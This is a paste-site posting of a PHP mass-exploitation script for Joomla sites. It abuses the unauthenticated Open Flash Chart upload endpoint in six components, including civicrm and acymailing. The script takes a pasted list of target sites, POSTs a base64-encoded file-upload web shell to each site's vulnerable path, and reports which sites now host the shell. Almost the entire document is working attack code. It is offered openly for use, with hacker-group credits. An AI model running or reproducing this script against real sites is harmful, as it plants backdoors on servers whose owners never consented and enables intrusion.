RCI Joomla Exploit PHP Version


SUBMITTED BY: Guest

DATE: Nov. 18, 2013, 2:52 a.m.

FORMAT: Text only

SIZE: 3.5 kB

HITS: 965

  1. <form method='POST'>
  2. <input type='text' name='name' value='sec4ever.php'>
  3. <input type='submit' value='Exploit' name='exploit'><br>
  4. <textarea name='sites' cols='45' rows='15'>Here Sites ;)</textarea>
  5. </form>
  6. <?
  7. /*
  8. # Coded By : xSecurity
  9. # Homepage : sec4ever.com - is-sec.com
  10. # GreetsTo : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z
  11. # Scanning : [ com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews ]
  12. */
  13. @set_time_limit(0);
  14. $site = explode("\r\n", $_POST['sites']);
  15. $filename = $_POST['name'];
  16. $path = array('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
  17. $name = array("/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/","/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/","/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/","/administrator/components/com_jinc/classes/graphics/tmp-upload-images/","/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/","/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/");
  18. $uploader = base64_decode("PD9waHAKZWNobyAnPHRpdGxlPlVwbG9hZCBGaWxlcyB4U2VjdXJpdHkgfCBTZWM0ZXZlci5Db008L3RpdGxlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11
  19. bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9Cj8+");
  20. $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
  21. $context = stream_context_create($options);
  22. if($_POST['exploit'])
  23. {
  24. foreach($site as $sites)
  25. {
  26. foreach($path as $upload)
  27. {
  28. $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
  29. }
  30. foreach($name as $names)
  31. {
  32. $url = "{$sites}{$names}{$filename}";
  33. $check = @file_get_contents($url);
  34. if(eregi("Sec4ever.CoM", $check))
  35. {
  36. echo "<font face='Tahoma' size='2'>[+] Exploit Complete => {$sites}/{$names}/{$filename} <br />";
  37. flush();
  38. }
  39. }
  40. }
  41. }
  42. echo "<font face='Tahoma' size='2'>[+] Coded By xSecurity => Sec4ever.CoM - is-sec.com <br> 4U : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z</font>";
  43. ?>

comments powered by Disqus